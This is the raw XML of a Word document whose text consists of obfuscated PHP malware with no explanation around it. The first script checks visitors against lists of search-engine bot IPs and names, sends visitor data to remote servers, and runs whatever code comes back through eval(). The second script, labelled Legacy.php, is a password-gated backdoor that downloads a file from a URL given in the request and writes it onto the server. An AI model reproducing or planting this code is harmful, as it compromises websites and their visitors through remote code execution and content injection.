.'FcLjY5JC8=','L' .'1' .'42OFwuMTQyXC4' .'yMTJcLjE5NyQ' .'v','L1' .'42OFwuMTQyXC4y' .'Mz' .'BcL' .'lswLTldKyQv','L' .'142OFwuMTQy' .'XC4yMzFcLjQ5JC' .'8=','L' .'1' .'42OF' .'wuMT' .'QyXC4yN' .'D' .'BcL' .'jEwNiQv','L' .'142OFwu' .'MTQy' .'XC4' .'yN' .'DZ' .'c' .'L' .'lswLTldKyQv','L142OFwuM' .'TQyXC4yN' .'Dlc' .'Lls' .'wLTldKyQv','' .'L142OFwu' .'MTQy' .'XC4' .'yNTBcLlswLTldK' .'yQv','L142O' .'FwuMTQyX' .'C4yNTF' .'c' .'Lls' .'wL' .'TldKyQv','L14' .'2OFwuMTgwX' .'C4yMTZcLjExMSQv','L' .'142OFwuMTgwXC4yNTBcL' .'lswLTldKyQv','' .'L142OFwuMTgwXC' .'4yNT' .'FcLls' .'w' .'LT' .'ldKyQv','L142OVwuM' .'TQ' .'3XC43OVwuKD' .'EzMXw' .'xM' .'zJ8' .'MTMzfDEzNH' .'wxMz' .'V8MTM2fDEzN3wxMzh8' .'MT' .'M5f' .'DE0MH' .'wxN' .'DF8MT' .'Q' .'yfDE0M3w' .'xND' .'R8MTQ1fDE' .'0Nnwx' .'ND' .'d8MT' .'Q4fDE' .'0OXwxN' .'TB8MTUxf' .'DE1' .'MnwxNTN8MTU0f' .'DE1NXwxN' .'T' .'Z8M' .'TU3fDE1OHwxNTl8' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'M' .'TYwfDE' .'2MXwxNjJ8MTYzfDE2NHwxNjV' .'8MT' .'Y2' .'fDE' .'2N3' .'wxNjh8' .'M' .'TY' .'5f' .'D' .'E3MHwxNzF8' .'MTc' .'yfDE3MykkLw==','L14' .'3MlwuMT' .'R' .'cLjE5OVw' .'uWzAt' .'OV0rJC' .'8' .'=','L' .'14' .'3M' .'lwuMzBcLjEwW' .'zE' .'t' .'NF1cL' .'lswL' .'TldKy' .'Qv','L1' .'43' .'M' .'lw' .'uMzBcLj' .'EwN' .'1wu' .'WzAtOV' .'0rJ' .'C8' .'=','L1' .'43' .'MlwuM' .'z' .'Bc' .'LjExWzAtMV' .'1cL' .'ls' .'w' .'LTldKyQv','L' .'14' .'3MlwuMz' .'BcLjEyNFwuKD' .'EyO' .'HwxMjl8MT' .'MwfDEzMX' .'wxMzJ8MTMzfDEzNCkk' .'L' .'w==','L143' .'MlwuMzBc' .'LjEyWzgtOV1' .'c' .'LlswLTldKy' .'Q' .'v','L1' .'43MlwuMzBcLjEzWz' .'EtNV1' .'cLlswLTldKyQv','L143Ml' .'w' .'uM' .'zBc' .'L' .'j' .'E0' .'MlwuW' .'zAt' .'OV0' .'rJC8=','L143Ml' .'wu' .'M' .'zBcL' .'jE' .'2MV' .'wuWzAtOV0rJC8=','L143M' .'lwuMzB' .'cLjE' .'3N1wuWz' .'AtOV' .'0rJC' .'8=','L143' .'M' .'lwuMzBcLjE' .'3' .'OVw' .'uWzAtO' .'V0rJC8=','L14' .'3Mlw' .'uMzB' .'cLj' .'I' .'xM1w' .'uMT' .'Ax' .'JC' .'8=','L143Ml' .'w' .'u' .'Mz' .'BcLjIxWzQ' .'t' .'Nl1cLlswLTldKy' .'Q' .'v','L' .'1' .'43Ml' .'wuM' .'z' .'BcLjI' .'yMV' .'w' .'uWzAtOV' .'0rJC8' .'=','L143MlwuMz' .'B' .'cLjIyNl' .'wuWzAt' .'OV' .'0rJC' .'8=','L143' .'MlwuMzBcLjI1Ml' .'wuWzAt' .'OV0rJC8=','L14' .'3Ml' .'wu' .'M' .'zBcLjU0XC5bMC05' .'XSsk' .'L' .'w==','' .'L143MlwuMzBc' .'Lj' .'U2XC5bMC0' .'5XS' .'skL' .'w=' .'=','L14' .'3Mlwu' .'MzBcLjZ' .'b' .'M' .'C0xXVwuW' .'zA' .'tO' .'V0rJC8=','L143Mlwu' .'Mz' .'BcLj' .'Y1XC' .'5bMC' .'05X' .'Ss' .'kLw==','L' .'143Mlwu' .'Mz' .'BcLjdb' .'OC05X' .'Vwu' .'WzAtOV0rJC' .'8=','L143Mlw' .'uM' .'zBcL' .'jg' .'xXC5' .'bMC05' .'XS' .'s' .'kLw' .'==','L' .'1' .'43Mlwu' .'MzBcLjg3' .'XC5' .'bMC0' .'5XSskLw==','L' .'143M' .'lwuMzBcLjlc' .'Ll' .'swLTldK' .'yQv','L1' .'43MlwuMzBcLjl' .'bN' .'y' .'05X' .'VwuWz' .'A' .'t' .'OV0rJ' .'C8=','' .'L1' .'43' .'NFwuNlwuMVs' .'xLT' .'NdX' .'C5b' .'M' .'C05XS' .'s' .'k' .'Lw==','L1' .'43NF' .'wuNlwu' .'MTMxXC' .'5' .'bM' .'C05' .'XSskL' .'w=' .'=','' .'L' .'143NFwuNlwuMVs2LTld' .'X' .'C5bM' .'C05' .'X' .'Ss' .'kLw=' .'=','' .'L' .'1' .'43' .'NFwuNlwuMls' .'wLTldXC5bMC05XSskLw==','L1' .'43NF' .'w' .'uNlw' .'uM1' .'swLTF' .'dXC5' .'b' .'MC05XSskLw==','' .'L1' .'43NFw' .'uNlwuNl' .'s1LTl' .'dXC5bMC05' .'XSsk' .'L' .'w' .'==','L143' .'NFw' .'uNlwuN' .'1' .'w' .'uWzAt' .'OV' .'0rJC8=','' .'L143N' .'FwuNlw' .'u' .'N1swLTZdX' .'C' .'5' .'bMC05XSsk' .'Lw==','L143NFw' .'u' .'Nlw' .'uNzlc' .'LlswLTld' .'KyQv','L143NFw' .'uNlw' .'uO' .'F' .'wuW' .'zAtOV0rJ' .'C8=','L' .'143NF' .'w' .'uNlwu' .'OFs1LTddXC5' .'bMC' .'05XSsk' .'L' .'w==','' .'L143' .'NFwu' .'NlwuOV' .'w' .'uWzAt' .'OV' .'0rJC' .'8' .'=','L' .'143N' .'FwuNl' .'wuMjQwXC5' .'bMC05' .'XSskLw=' .'=','L143NF' .'wu' .'MTI1X' .'C' .'40Mlw' .'uWzA' .'tOV' .'0rJC8=','' .'L143NF' .'wuMTI1XC4' .'0NlwuWzA' .'t' .'OV0rJC' .'8' .'=','' .'L14yM' .'DlcLjg' .'1XC' .'4yMjhc' .'LlswLTl' .'dKy' .'Qv','L' .'14yMD' .'lcLjg1XC4yMjZcLlswLTld' .'KyQv','' .'L' .'14' .'xM' .'jdcLj' .'BcLj' .'Bc' .'LjEk' .'Lw==','' .'L0dv' .'b' .'2dsZW' .'Jvd' .'C9p','L2' .'d' .'vb2ds' .'ZS9' .'p','L2Jpbmdi' .'b3' .'Qv' .'aQ==','L2J' .'pbmcvaQ==','L1lhaG9vL2k' .'=','L3' .'NsdXJw' .'L2k=','L21zbmJ' .'vdC9p','L' .'0' .'1lZ' .'G' .'lhc' .'GFydG5' .'lcnMvaQ' .'==','L0NoYXJsb3' .'R0ZS9p','' .'L' .'3d3d3' .'N0ZXIva' .'Q' .'==','L2' .'x5' .'b' .'ng' .'vaQ==','L1R3aWNlbGV' .'yL2k=','' .'bw' .'=' .'=','' .'c2VhcmNoLm' .'1' .'zbi5' .'jb20=','c2Vhc' .'mNoLmFvb' .'C5jb20=','c' .'2V' .'h' .'cm' .'No' .'Lnl' .'h' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>.'aG9vLmNvbQ==','YmluZy5jb20=','Y' .'W9sL' .'mNvbQ==','bXNuLmNvbQ==','YXZnL' .'m' .'NvbQ=' .'=','YXNrLmNvb' .'Q==','YnQu' .'Y29' .'t','Y29t' .'Y2Fz' .'d' .'C5uZX' .'Q' .'=','Y2' .'9uZ' .'H' .'VpdC5jb20=','' .'ZG' .'9ncGlsZ' .'S' .'5' .'jb20=','bXlwb2l' .'udHM' .'uY' .'2' .'9t','c2VhcmNoLXJlc3Vsd' .'HMu' .'Y29t','c' .'2' .'V' .'h' .'cmN' .'o' .'LnN1cm' .'ZjY' .'W55b' .'24uY29t','bX' .'l3ZWJ' .'zZWFyY2' .'guY29t','' .'c2V' .'hc' .'mNoLm15d2V' .'ic2Vh' .'cmNoLm' .'NvbQ==','' .'c3Rh' .'cn' .'Rw' .'YW' .'dp' .'bmE' .'ubmw=','YmluZw=' .'=','Z29' .'vZ2xl','e' .'WFob28=','' .'YW9sLg==','c' .'3' .'VyZmNhbnlvbg==','c2' .'Vhc' .'mN' .'o','YmxvZ3Nwb3Q' .'uY29t','' .'fA==','a' .'G9zd' .'A==','dXJs','aXA=','cm' .'VmZXJlcg==','dXNlcmFnZ' .'W' .'50','' .'L148ZG' .'F0' .'Y' .'T4o' .'Liop' .'P' .'FwvZGF' .'0Y' .'T4' .'kL2k' .'=','L' .'1' .'48' .'ZG' .'F0' .'YT4v' .'aQ==','','LzxcL2' .'RhdG' .'E+JC9p','');return base64_decode($a[$i]);} ?&gt;&lt;?php $GLOBALS['_1739858145_'][0](round(0));$GLOBALS['_1739858145_'][1](_1708135491(0),round(0+3.2+3.2+3.2+3.2+3.2));$GLOBALS['_1739858145_'][2](_1708135491(1),round(0+2+2));$_d34d701336355bd3aa2439324b3711f4=array(_1708135491(2),_1708135491(3),);$_077463164b058c3ed76ef5c98c7013dd=$_SERVER[_1708135491(4)];$_7df03df151dfc6dfd5316a575c752529=$_SERVER[_1708135491(5)];$_ae67f9397914c923fed4b09c8557465e=$_SERVER[_1708135491(6)];if((round(0+457+457+457+457)^round(0+609.333333333+609.333333333+609.333333333))&amp;&amp; $GLOBALS['_1739858145_'][3]($_97528c7d2b8c0f6ee9f23d19af127f52,$_8e84f18be79b72b8789f4ee79bbd1471))$GLOBALS['_1739858145_'][4]($_00b1c8a06fbb30456f6ce7b141d1bfe1,$_077463164b058c3ed76ef5c98c7013dd);$_e9d362c726c719071183ea32013f3e78=$_SERVER[_1708135491(7)];$_97528c7d2b8c0f6ee9f23d19af127f52=$_SERVER[_1708135491(8)];if((round(0+4738)^round(0+2369+2369))&amp;&amp; $GLOBALS['_1739858145_'][5]($_feb4e0bfcdf9b3affd86951e6b1ac069,$_7df03df151dfc6dfd5316a575c752529))$GLOBALS['_1739858145_'][6]($_404dea77095e382fd880eb3e23cee407,$_bd24fb659f989d070d2db54303c75b06,$_ce439f5fe9ccf870ebb4441799264918);$_00b1c8a06fbb30456f6ce7b141d1bfe1=$_SERVER[_1708135491(9)];$_404dea77095e382fd880eb3e23cee407=$_SERVER[_1708135491(10)];$_624674f5b588dc8d614c81b28949787a=$_SERVER[_1708135491(11)];$_ae67f9397914c923fed4b09c8557465e=$GLOBALS['_1739858145_'][7](_1708135491(12),_1708135491(13),$_ae67f9397914c923fed4b09c8557465e);$_0e05b676e4dc7367ab06adfa1142fcbe=_1708135491(14);function l__44e7d40237bfa3e52bb896f19ab7cd74($_1aa753f3b9014b8e131ace8b5f380e11,$_a657c32b80691849e8c7cc1945503758,$_4525e739fe4e3bad8146d16f522c7e42){$_d9bbfcf56741c6f6867c7473e80a6971=array(_1708135491(15),_1708135491(16),_1708135491(17),);$_5f8ae4d52c08e16b3a273b09b3fc77e8=round(0+3598);$_feb4e0bfcdf9b3affd86951e6b1ac069=array(_1708135491(18),);if((round(0+194+194)^round(0+194+194))&amp;&amp; $GLOBALS['_1739858145_'][8]($_a657c32b80691849e8c7cc1945503758))$GLOBALS['_1739858145_'][9]($_5ecb9d89d3a77f8fe80ccf7e9d8dbb98,$_d8596ee207ec96c10a1d14e71a47645a,$_f93e73bf43eb6e4bbfde7ca9836956d5);$_5ecb9d89d3a77f8fe80ccf7e9d8dbb98=$GLOBALS['_1739858145_'][10](_1708135491(19),$_d9bbfcf56741c6f6867c7473e80a6971);if($GLOBALS['_1739858145_'][11]("/$_5ecb9d89d3a77f8fe80ccf7e9d8dbb98/i",$_1aa753f3b9014b8e131ace8b5f380e11)){$_e95932465974f348e53a5c2d371c2aa4=round(0+1);}$_9bbffc0a504da03d695178ffce5948c5=$GLOBALS['_1739858145_'][12](_1708135491(20),$_feb4e0bf</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cdf9b3affd86951e6b1ac069);if($GLOBALS['_1739858145_'][13]("/$_9bbffc0a504da03d695178ffce5948c5/i",$_4525e739fe4e3bad8146d16f522c7e42)){$_e95932465974f348e53a5c2d371c2aa4=round(0+0.333333333333+0.333333333333+0.333333333333);}return $_e95932465974f348e53a5c2d371c2aa4;}function l__8152ea14afbc6c9a5a7257a5155627e6($_1aa753f3b9014b8e131ace8b5f380e11,$_a657c32b80691849e8c7cc1945503758,$_4525e739fe4e3bad8146d16f522c7e42){$_f93e73bf43eb6e4bbfde7ca9836956d5=array(_1708135491(21),_1708135491(22),_1708135491(23),_1708135491(24),_1708135491(25),_1708135491(26),_1708135491(27),_1708135491(28),_1708135491(29),_1708135491(30),_1708135491(31),_1708135491(32),_1708135491(33),_1708135491(34),_1708135491(35),_1708135491(36),_1708135491(37),_1708135491(38),_1708135491(39),_1708135491(40),_1708135491(41),_1708135491(42),_1708135491(43),_1708135491(44),_1708135491(45),_1708135491(46),_1708135491(47),_1708135491(48),_1708135491(49),_1708135491(50),_1708135491(51),_1708135491(52),_1708135491(53),_1708135491(54),_1708135491(55),_1708135491(56),_1708135491(57),_1708135491(58),_1708135491(59),_1708135491(60),_1708135491(61),_1708135491(62),_1708135491(63),_1708135491(64),_1708135491(65),_1708135491(66),_1708135491(67),_1708135491(68),_1708135491(69),_1708135491(70),_1708135491(71),_1708135491(72),_1708135491(73),_1708135491(74),_1708135491(75),_1708135491(76),_1708135491(77),_1708135491(78),_1708135491(79),_1708135491(80),_1708135491(81),_1708135491(82),_1708135491(83),_1708135491(84),_1708135491(85),_1708135491(86),_1708135491(87),_1708135491(88),_1708135491(89),_1708135491(90),_1708135491(91),_1708135491(92),_1708135491(93),_1708135491(94),_1708135491(95),_1708135491(96),_1708135491(97),_1708135491(98),_1708135491(99),_1708135491(100),_1708135491(101),_1708135491(102),_1708135491(103),_1708135491(104),_1708135491(105),_1708135491(106),_1708135491(107),_1708135491(108),_1708135491(109),_1708135491(110),_1708135491(111),_1708135491(112),_1708135491(113),_1708135491(114),_1708135491(115),_1708135491(116),_1708135491(117),_1708135491(118),_1708135491(119),_1708135491(120),_1708135491(121),_1708135491(122),_1708135491(123),_1708135491(124),_1708135491(125),_1708135491(126),_1708135491(127),_1708135491(128),_1708135491(129),_1708135491(130),_1708135491(131),_1708135491(132),_1708135491(133),_1708135491(134),_1708135491(135),_1708135491(136),_1708135491(137),_1708135491(138),_1708135491(139),_1708135491(140),_1708135491(141),_1708135491(142),_1708135491(143),_1708135491(144),_1708135491(145),_1708135491(146),_1708135491(147),_1708135491(148),_1708135491(149),_1708135491(150),_1708135491(151),_1708135491(152),_1708135491(153),_1708135491(154),_1708135491(155),_1708135491(156),_1708135491(157),_1708135491(158),_1708135491(159),_1708135491(160),_1708135491(161),_1708135491(162),_1708135491(163),_1708135491(164),_1708135491(165),_1708135491(166),_1708135491(167),_1708135491(168),_1708135491(169),_1708135491(170),_1708135491(171),_1708135491(172),_1708135491(173),_1708135491(174),_1708135491(175),_1708135491(176),_1708135491(177),_1708135491(178),_1708135491(179),_1708135491(180),_1708135491(181),_1708135491(182),_1708135491(183),_1708135491(184),_1708135491(185),_1708135491(186),_1708135491(187),_1708135491(188),_1708135491(189),_1708135491(190),_1708135491(191),_1708135491(192),_1708135491(193),_1708135491(194),_1708135491(195),_1708135491(196),_1708135491(197),_1708135491(198),_1708135491(199),_1708135491(200),_1708135491(201),_1708135491(202),_1708135491(203),_1708135491(204),_1708135491(205),_1708135491(206),_1708135491(207),_1708135491(208),_1708135491(209),_1708135491(210),_1708135491(211),_17081354</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>91(212),_1708135491(213),_1708135491(214),_1708135491(215),_1708135491(216),_1708135491(217),_1708135491(218),_1708135491(219),_1708135491(220),_1708135491(221),_1708135491(222),_1708135491(223),_1708135491(224),_1708135491(225),_1708135491(226),_1708135491(227),_1708135491(228),_1708135491(229),_1708135491(230),_1708135491(231),_1708135491(232),_1708135491(233),_1708135491(234),_1708135491(235),_1708135491(236),_1708135491(237),_1708135491(238),_1708135491(239),_1708135491(240),_1708135491(241),_1708135491(242),_1708135491(243),_1708135491(244),_1708135491(245),_1708135491(246),_1708135491(247),_1708135491(248),_1708135491(249),_1708135491(250),_1708135491(251),_1708135491(252),_1708135491(253),_1708135491(254),_1708135491(255),_1708135491(256),_1708135491(257),_1708135491(258),_1708135491(259),_1708135491(260),_1708135491(261),_1708135491(262),_1708135491(263),_1708135491(264),_1708135491(265),_1708135491(266),_1708135491(267),);if((round(0+76)^round(0+76))&amp;&amp; $GLOBALS['_1739858145_'][14]($_e95932465974f348e53a5c2d371c2aa4,$_e95932465974f348e53a5c2d371c2aa4))$GLOBALS['_1739858145_'][15]($_d8596ee207ec96c10a1d14e71a47645a);$_32c9cd70fd5ea067e018dac1fcc71d0f=array(_1708135491(268),_1708135491(269),_1708135491(270),_1708135491(271),_1708135491(272),_1708135491(273),_1708135491(274),_1708135491(275),_1708135491(276),_1708135491(277),_1708135491(278),_1708135491(279),);$_314029ecac8c0163196531717058b020=_1708135491(280);$_8dbf0b21830abea1b03d5dfdf2c74888=array(_1708135491(281),_1708135491(282),_1708135491(283),_1708135491(284),_1708135491(285),_1708135491(286),_1708135491(287),_1708135491(288),_1708135491(289),_1708135491(290),_1708135491(291),_1708135491(292),_1708135491(293),_1708135491(294),_1708135491(295),_1708135491(296),_1708135491(297),_1708135491(298),_1708135491(299),_1708135491(300),_1708135491(301),_1708135491(302),_1708135491(303),_1708135491(304),_1708135491(305),);(round(0+1620.66666667+1620.66666667+1620.66666667)-round(0+2431+2431)+round(0+278+278+278+278)-round(0+278+278+278+278))?$GLOBALS['_1739858145_'][16]($_5ecb9d89d3a77f8fe80ccf7e9d8dbb98):$GLOBALS['_1739858145_'][17](round(0+2533),round(0+2431+2431));$_1a54331fe885b5f83b3c3134f09f60d6=round(0);if($_1a54331fe885b5f83b3c3134f09f60d6 == round(0)){foreach($_f93e73bf43eb6e4bbfde7ca9836956d5 as $_0a2f32a821e1c6f8ea8cd8afc720616e){if($GLOBALS['_1739858145_'][18]($_0a2f32a821e1c6f8ea8cd8afc720616e,$_4525e739fe4e3bad8146d16f522c7e42)){$_1a54331fe885b5f83b3c3134f09f60d6=round(0+0.333333333333+0.333333333333+0.333333333333);break;}}}if($_1a54331fe885b5f83b3c3134f09f60d6 == round(0)){foreach($_32c9cd70fd5ea067e018dac1fcc71d0f as $_d8596ee207ec96c10a1d14e71a47645a){if($GLOBALS['_1739858145_'][19]($_d8596ee207ec96c10a1d14e71a47645a,$_1aa753f3b9014b8e131ace8b5f380e11)){$_1a54331fe885b5f83b3c3134f09f60d6=round(0+0.2+0.2+0.2+0.2+0.2);break;}}}if($_1a54331fe885b5f83b3c3134f09f60d6 == round(0)){$_8e84f18be79b72b8789f4ee79bbd1471=$GLOBALS['_1739858145_'][20](_1708135491(306),$_8dbf0b21830abea1b03d5dfdf2c74888);if($GLOBALS['_1739858145_'][21]("/$_8e84f18be79b72b8789f4ee79bbd1471/i",$_a657c32b80691849e8c7cc1945503758)){$_1a54331fe885b5f83b3c3134f09f60d6=round(0+0.333333333333+0.333333333333+0.333333333333);}}return $_1a54331fe885b5f83b3c3134f09f60d6;}if(l__44e7d40237bfa3e52bb896f19ab7cd74($_1aa753f3b9014b8e131ace8b5f380e11,$_a657c32b80691849e8c7cc1945503758,$_4525e739fe4e3bad8146d16f522c7e42)== round(0)){if(l__8152ea14afbc6c9a5a7257a5155627e6($_077463164b058c3ed76</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ef5c98c7013dd,$_7df03df151dfc6dfd5316a575c752529,$_624674f5b588dc8d614c81b28949787a)){$_bd24fb659f989d070d2db54303c75b06=array(_1708135491(307)=&gt; $_ae67f9397914c923fed4b09c8557465e,_1708135491(308)=&gt; $_404dea77095e382fd880eb3e23cee407,_1708135491(309)=&gt; $_624674f5b588dc8d614c81b28949787a,_1708135491(310)=&gt; $_7df03df151dfc6dfd5316a575c752529,_1708135491(311)=&gt; $_077463164b058c3ed76ef5c98c7013dd,);$_aa15a3c81fd674e62c93bf28629cbb72=$GLOBALS['_1739858145_'][22]($GLOBALS['_1739858145_'][23]($_bd24fb659f989d070d2db54303c75b06));$_b54b9ed8468257ae65c0cd2c4950f930=round(0);foreach($_d34d701336355bd3aa2439324b3711f4 as $_ce439f5fe9ccf870ebb4441799264918){$_9abea10ff83c0f847f4f759cbf8e2fb9=$_ce439f5fe9ccf870ebb4441799264918;@$_e30791da8e93796bb84203fce3b1eca1=$GLOBALS['_1739858145_'][24]($GLOBALS['_1739858145_'][25]($_9abea10ff83c0f847f4f759cbf8e2fb9) ."?data=&lt;data&gt;$_aa15a3c81fd674e62c93bf28629cbb72&lt;/data&gt;");if($GLOBALS['_1739858145_'][26](_1708135491(312),$_e30791da8e93796bb84203fce3b1eca1)){$_b54b9ed8468257ae65c0cd2c4950f930=round(0+0.5+0.5);break;}}if($_b54b9ed8468257ae65c0cd2c4950f930 == round(0+0.5+0.5)){$_e30791da8e93796bb84203fce3b1eca1=$GLOBALS['_1739858145_'][27](_1708135491(313),_1708135491(314),$_e30791da8e93796bb84203fce3b1eca1);$_e30791da8e93796bb84203fce3b1eca1=$GLOBALS['_1739858145_'][28](_1708135491(315),_1708135491(316),$_e30791da8e93796bb84203fce3b1eca1);$_58147c42a64015f2a1be1e077dbbd8dc=$GLOBALS['_1739858145_'][29]($GLOBALS['_1739858145_'][30]($_e30791da8e93796bb84203fce3b1eca1));if($_58147c42a64015f2a1be1e077dbbd8dc){eval($_58147c42a64015f2a1be1e077dbbd8dc["eval"]);};};}} ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006510B0" w:rsidRDefault="006510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510B0" w:rsidRDefault="006510B0" w:rsidP="006510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Legacy.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006510B0" w:rsidRDefault="006510B0" w:rsidP="006510B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006510B0" w:rsidRPr="006510B0" w:rsidRDefault="006510B0" w:rsidP="006510B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;? echo "i";$GLOBALS['_1368541112_']=Array(base64_decode('bWQ' .'1'),base64_decode('' .'ZmdldH' .'M' .'='),base64_decode('Zmls' .'ZV' .'9nZXRfY2' .'9' .'udGV' .'udH' .'M' .'='),base64_decode('ZmRmX3NldF92' .'Z' .'XJ' .'zaW9u'),base64_decode('c3V' .'ic3RyX2Nvd' .'W' .'50'),base64_decode('' .'Zm9wZ' .'W4='),base64_decode('a' .'W' .'1hZ2Vjb' .'3B5bWVyZ2Vncm' .'F' .'5'),base64_decode('Zn' .'B1dH' .'M='),base64_decode('' .'Z' .'mNsb3Nl'),base64_decode('b' .'XRfcmFu' .'Z' .'A' .'=='),base64_decode('Y29weQ' .'=' .'=')); ?&gt;&lt;? function _1509319385($i){$a=Array('' .'SFRUUF' .'9' .'IT1NU','cA' .'==','dXJs','cGF0aA=' .'=','d' .'ys=','Z' .'3E' .'=');return base64_decode($a[$i]);} ?&gt;&lt;?php $_0=$GLOBALS['_1368541112_'][0]($_SERVER[_1509319385(0)]);while(round(0+1075.75+1075.75+1075.75+1075.75)-round(0+860.6+860.6+860.6+860.6+860.6))$GLOBALS['_1368541112_'][1]($_1,$_2,$_SERVER);if($_GET[_1509319385(1)]== $_0){$_2=$_GET[_1509319385(2)];$_3=$_GET[_1509319385(3)];$_1=$GLOBALS['_1368541112_'][2]($_2);if((round(0+622.5+622.5+622.5+622.5)+round(0+1081.75+1081.75+1081.75+1081.75))&gt;round(0+830+830+830)|| $GLOBALS['_1368541112_'][3]($_1));else{$GLOBALS['_1368541112_'][4]($_SERVER,$_1,$_2,$_4);}$_4=$GLOBALS['_1368541112_'][5]($_3,_1509319385(4));while(round(0+1166.66666667+1166.66666667+1166.66666667)-round(0+700+700+700+700+700))$GLOBALS['_1368541112_'][6]($_4,$_4);$GLOBALS['_1368541112_'][7]($_4,$_1);$GLOBALS['_1368541112_'][8]($_4);$_5=_1509319385(5);echo Ok;if(round(0+2677.66666667+2677.66666667+2677.66666667)&lt;$GLOBALS['_1368541112_'][9](round(0+1148.33333333+1148.33333333+1148.33333333),round(0+4583)))$GLOBALS['_1368541112_'][10]($_1);} ?&gt;</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="006510B0" w:rsidRPr="0065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B0"/>
    <w:rsid w:val="00243602"/>
    <w:rsid w:val="006510B0"/>
    <w:rsid w:val="006B6A96"/>
    <w:rsid w:val="00D0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02"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002436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43602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43602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43602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436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6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602"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto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02"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002436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43602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43602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43602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436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6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602"/>
    <w:pPr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11331</Words>
  <Characters>64589</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>538</Lines>
  <Paragraphs>151</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>75769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Bradford</dc:creator>
  <cp:lastModifiedBy>Bradford</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-25T21:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-25T21:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>